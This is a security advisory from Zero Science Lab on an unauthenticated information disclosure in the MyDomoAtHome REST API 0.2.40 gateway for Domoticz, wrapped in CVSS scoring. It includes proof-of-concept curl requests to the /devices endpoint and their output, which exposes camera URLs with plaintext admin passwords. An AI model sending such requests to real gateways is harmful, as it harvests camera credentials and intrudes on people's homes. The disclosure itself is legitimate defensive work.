Gjoko KrsticZSL-2019-5555MyDomoAtHome (MDAH) REST API Domoticz ISS Gateway 0.2.40 Information Disclosure
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 High
AI Score
Confidence
High
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.023 Low
EPSS
Percentile
89.5%
Title: MyDomoAtHome (MDAH) REST API Domoticz ISS Gateway 0.2.40 Information Disclosure
Advisory ID: ZSL-2019-5555
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information, Security Bypass
Risk: (4/5)
Release Date: 29.12.2019
Summary
REST Gateway between Domoticz and Imperihome ISS. Domoticz is a home automation system with a pretty wide library of supported devices, ranging from weather stations to smoke detectors to remote controls, and a large number of additional third-party integrations are documented on the projectβs website. It is designed with an HTML5 frontend, making it accessible from desktop browsers and most modern smartphones, and is lightweight, running on many low-power devices like the Raspberry Pi.
Description
MyDomoAtHome REST API is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information.
Vendor
Emmanuel - <https://github.com/empierre/MyDomoAtHome>
Affected Version
0.2.40
Tested On
NodeJS: 10.15.0, 8.15.1, 8.15.0, 8.11.1, 8.9.4, 4.8.7, 4.2.2
Webmanager/Engine: EJS
Renderer: Express
Vendor Status
N/A
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <https://www.exploit-db.com/exploits/47824>
[2] <https://packetstormsecurity.com/files/155787>
[3] <https://cxsecurity.com/issue/WLB-2020010007>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/173700>
[5] <https://vulners.com/cve/CVE-2020-21990>
[6] <https://nvd.nist.gov/vuln/detail/CVE-2020-21990>
[7] <https://www.tenable.com/cve/CVE-2020-21990>
Changelog
[29.12.2019] - Initial release
[24.01.2020] - Added reference [1], [2], [3] and [4]
[19.06.2021] - Added reference [5], [6] and [7]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>MyDomoAtHome (MDAH) REST API Domoticz ISS Gateway 0.2.40 Information Disclosure
Vendor: Emmanuel
Product web page: https://github.com/empierre/MyDomoAtHome
https://www.domoticz.com/wiki/ImperiHome
https://docs.imperihome.com/app/iss
Affected version: 0.2.40
Summary: REST Gateway between Domoticz and Imperihome ISS. Domoticz is a home automation
system with a pretty wide library of supported devices, ranging from weather stations to
smoke detectors to remote controls, and a large number of additional third-party integrations
are documented on the project's website. It is designed with an HTML5 frontend, making it
accessible from desktop browsers and most modern smartphones, and is lightweight, running
on many low-power devices like the Raspberry Pi.
Desc: MyDomoAtHome REST API is affected by an information disclosure vulnerability due to
improper access control enforcement. An unauthenticated remote attacker can exploit this,
via a specially crafted request to gain access to sensitive information.
Tested on: NodeJS: 10.15.0, 8.15.1, 8.15.0, 8.11.1, 8.9.4, 4.8.7, 4.2.2
Webmanager/Engine: EJS
Renderer: Express
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5555
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5555.php
07.11.2019
--
--snip--
Device Type string: DevCamera
Param Key Description
----------------------------
localjpegurl Local URL to the JPEG snapshot of the camera (Note : login/pass can be passed like this http://login:pass@url)
localmjpegurl Local URL to the camera's MJPEG stream
remotejpegurl Remote URL to the JPEG snapshot of the camera
remotemjpegurl Remote URL to the camera's MJPEG stream
--snip--
PoC #1:
-------
root@kali:~/domoticz# curl -s http://192.168.0.100:3001/devices |tail -c $((100+850))
[{"value":"http://admin:[email protected]:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"localjpegurl"},{"value":"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"remotejpegurl"}],"name":"ExtΓ©rieur","type":"DevCamera","id":"2_cam","room":"Switches"},{"params":[{"value":"http://admin2:[email protected]:8084/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin2&pwd=An0th3rs3cr3tp4ss","key":"localjpegurl"},{"value":"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"remotejpegurl"}],"name":"cuisine","type":"DevCamera","id":"3_cam","room":"Switches"},{"params":[{"value":"http://127.0.0.1:8080/uvccapture.cgi","key":"localjpegurl"},{"value":"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"remotejpegurl"}],"name":"uvccam","type":"DevCamera","id":"4_cam","room":"Switches"}]}
PoC #2:
-------
root@kali:~/domoticz# curl -s http://192.168.1.100:3001/devices |tail -c $((200-22))
{"id":"C0","name":"Portail","type":"DevCamera","room":"Switches","params":[{"key":"localjpegurl","value":"http://admin:y3T4n0ther1&&@http://192.168.1.210/doc/page/preview.asp"}]}]}
</p></body></html>
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 High
AI Score
Confidence
High
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.023 Low
EPSS
Percentile
89.5%